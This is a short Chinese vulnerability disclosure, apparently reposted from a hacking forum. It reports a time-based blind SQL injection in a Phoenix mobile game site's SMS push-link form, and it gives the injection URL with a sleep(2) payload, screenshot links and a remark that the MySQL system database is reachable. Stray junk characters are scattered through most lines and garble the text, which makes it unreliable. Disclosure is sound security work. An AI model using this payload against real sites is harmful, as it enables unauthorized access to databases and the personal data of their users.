简要描述:
% ?7 ]" W: w- t6 n凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
; t- N Z( K# B+ T
6 _4 ^) k; D/ U详细说明:& r& G' Z% ^% W% @: N1 t9 `
存在SQL盲注url:
- g( o2 K9 s; k, h yfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=12 ?# _+ P% V; q8 P! w
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
7 j2 k+ a$ V( W" C! Mhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
4 u( r6 P+ n$ E4 X9 t: _, V; Shttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg2 k7 N- g9 h+ g
* m3 r% J$ F9 R9 i. a, I# t9 y$ E/ H4 p
能看到mysql系统数据库,看来user权限应该很高的。。 |